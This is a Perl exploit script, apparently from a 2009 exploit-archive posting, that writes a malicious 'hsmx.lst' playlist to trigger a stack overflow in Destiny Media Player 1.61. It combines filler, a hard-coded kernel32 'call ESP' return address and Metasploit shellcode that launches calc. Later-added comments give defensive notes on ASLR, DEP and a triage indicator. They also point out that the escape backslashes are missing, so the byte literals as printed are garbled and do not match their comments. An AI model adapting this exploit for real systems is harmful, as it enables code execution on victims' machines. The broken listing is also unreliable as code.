
dmp161lst3-overflow.txt

Posted on 06 January 2009

#!/usr/bin/perl -w
# exploit coded by Houssamix
# poc found by aBo MoHaMeD
#
# Purpose: builds one buffer and appends it to "hsmx.lst", a playlist file
# that the banner below says targets a local stack overflow in
# Destiny Media Player 1.61 (.lst parsing).
# Buffer layout, in order: filler, return-address value, one NOP, payload.
#
# NOTE(review): the "xNN" literals in this listing carry no backslashes
# (probably lost in page extraction), so as printed they are plain ASCII
# text and not the byte values the inline comments describe.
#
# Defender notes:
#  - The return value is a hard-coded kernel32.dll address (per the author's
#    comment), so it is tied to one specific kernel32.dll build and presumes
#    module addresses are not randomised (no ASLR) -- confirm per target OS.
#  - The payload is placed right after the return value and, presumably, runs
#    from the stack; DEP/NX on the player process would be expected to stop it.
#  - Triage indicator: a .lst playlist that opens with a very long run of one
#    repeated character followed by non-text data is anomalous for a playlist.
#  - Treat .lst files from untrusted sources as hostile for this player version.

# Banner only; no effect on the generated file.
print "===================================================================== ";
print "Author : Houssamix ";
print "===================================================================== ";
print "Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit ";
print "===================================================================== ";

# Filler string repeated 2052 times; sits in front of the return value.
my $overflow = "x41" x 2052;
# Value placed where the author expects the saved return address to be.
my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll 0x7C82385D
# A single NOP between the return value and the payload.
my $nop = "x90" x 1;

# Payload: per the generator comment below, an encoded Metasploit win32_exec
# stub with CMD=calc, i.e. a demonstration that launches the calculator.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

# Output file name, relative to the current working directory.
my $file="hsmx.lst";

# Concatenate the four parts in the order the overflow layout requires.
# $exploit is a package global here (no `my`; the script does not use strict).
$exploit = $overflow.$ret.$nop.$shellcode;

# Two-argument open in append mode (">>"); dies with the OS error on failure.
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created ";

 
